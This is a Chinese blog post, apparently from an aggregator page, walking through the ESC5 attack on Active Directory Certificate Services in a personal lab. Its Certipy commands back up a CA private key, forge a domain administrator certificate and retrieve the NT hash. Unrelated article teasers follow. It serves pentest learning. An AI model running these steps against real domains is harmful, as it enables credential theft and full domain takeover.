news 2026/8/21 23:16:54

深入解析ESC5 ADCS配置漏洞利用——活动目录渗透测试实战

作者头像

张小明

前端开发工程师

1.2k 24
文章封面图
深入解析ESC5 ADCS配置漏洞利用——活动目录渗透测试实战

摘要

继我之前写的ESC4文章之后——现在我的工作完成了,终于有更多时间学习,我想我也要深入研究一下ESC5。说实话,我不知道为什么,但学习活动目录(Active Directory)利用感觉起来更令人兴奋,尽管在印度尼西亚的真实环境中仍然相当罕见。可能只是我理想主义的一面吧,哈哈哈。好了,让我们开始一起学习吧。

什么是ESC5

ESC5是一种针对活动目录证书服务(ADCS)的攻击。这种攻击利用了对证书颁发机构(CA)的访问权限。如果攻击者获得了CA服务器上的本地管理员权限,就可以提取CA证书及其私钥。利用该私钥,攻击者可以为特权账户(如域管理员)伪造恶意证书。然后,这些伪造的证书可用于通过PKINIT向AD进行身份验证并请求TGT(票据授予票据)。

搭建实验室

创建一个任意名称的账户,并将该账户添加为CA服务器(DC01)上的本地管理员:

net localgroup Administrators"igniteraj"/add net localgroup Administrators

(按回车或点击查看完整大小的图片)

枚举与利用

使用Certipy在CA服务器上以本地管理员账户枚举证书。
(按回车或点击查看完整大小的图片)
(按回车或点击查看完整大小的图片)

使用Certipy备份CA证书和私钥。

certipy ca -backup -u alex.doe@sandbox.local -p"MyPassword123"-ca ignite-DC-CA -target10.100.150.10

伪造我们想要接管的账户——在本例中是administrator@sandbox.local,因为它是我的目标上的域管理员。

certipy forge -ca-pfx'sandbox-ca.pfx'-upn administrator@sandbox.local

使用Certipy获取administrator@sandbox.local账户的NT哈希。

certipy auth -pfx administrator_forged.pfx -dc-ip10.100.150.10

(按回车或点击查看完整大小的图片)
(按回车或点击查看完整大小的图片)

使用SecretDump导出哈希凭据。
(按回车或点击查看完整大小的图片)

参考资料

  • https://www.hackingarticles.in/ad-cs-esc5-vulnerable-pki-object-access-control/
  • https://mayfly277.github.io/posts/ADCS-part14/
  • https://www.vaadata.com/blog/ad-cs-security-understanding-and-exploiting-esc-techniques/
    CSD0tFqvECLokhw9aBeRqixLzx0482UkkKWM4rJX2T+9qXDLcUYQal3W1ykfQ9si0pulG6s9/0h/hW8d28k1SsX8sObhJabP00Qx1uju62JSdqgDv8XWiIQ1stSnFOlB/q2Fi82D6F6LlOrFptzcOg==
    更多精彩内容 请关注我的个人公众号 公众号(办公AI智能小助手)
    对网络安全、黑客技术感兴趣的朋友可以关注我的安全公众号(网络安全技术点滴分享)
版权声明: 本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若内容造成侵权/违法违规/事实不符,请联系邮箱:809451989@qq.com进行投诉反馈,一经查实,立即删除!
网站建设 2026/8/20 8:35:23

XC7Z020-2CLG484I, 双核ARM Cortex-A9处理器, 现货库存

型号介绍今天我要向大家介绍的是 Xilinx 的一款处理器——XC7Z020-2CLG484I。 它搭载了相当规模的FPGA逻辑资源,包括278,624个逻辑单元、36个18x18位的DSP48E1乘法器、2个块RAM(Block RAM)以及大量的分布式RAM和移位寄存器。PL部分允许用户实…

作者头像 李华
网站建设 2026/8/20 18:35:45

DBLens 的数据安全、登录方式与离线使用说明

在选择数据库管理工具时,开发者和企业用户通常会重点关注以下问题: 数据库连接信息是否安全?工具会不会获取或上传数据库数据?执行日志、AI 对话是否会被收集?是否支持离线使用?登录方式是否可控&#xff0…

作者头像 李华
网站建设 2026/8/21 7:44:55

基于Modbus的电机控制上位机程序——用Qt打造高效控制界面

qt例程~基于Modbus的电机控制上位机程序 功能包括: 1、基于委托的表格自定义样式; 2、基于Modbus的电机配置文件读取和写入; 3、电机状态的实时显示。 在工业控制领域,基于Modbus协议的电机控制上位机程序至关重要。今…

作者头像 李华
网站建设 2026/8/21 12:17:55

GEO优化:AI搜索时代的品牌基建与可见度革命

摘要当ChatGPT、DeepSeek、Kimi等AI对话工具月活用户突破数亿,成为获取产品推荐、行业解决方案的新入口时,一个严峻的现实是:绝大多数品牌在这些AI的回答中“查无此人”。这背后,是消费决策入口的深刻变迁,以及品牌可见…

作者头像 李华
网站建设 2026/8/20 18:46:35

day 30

浙大疏锦行

作者头像 李华
网站建设 2026/8/21 21:47:39

AutoGPT是否需要持续人工干预?我们做了72小时连续测试

AutoGPT是否需要持续人工干预?我们做了72小时连续测试 在AI助手还停留在“你问我答”阶段时,AutoGPT已经悄悄迈出了下一步:它不再等你一条条发指令,而是听完目标后就自己动起来——查资料、写代码、整理报告,甚至知道什…

作者头像 李华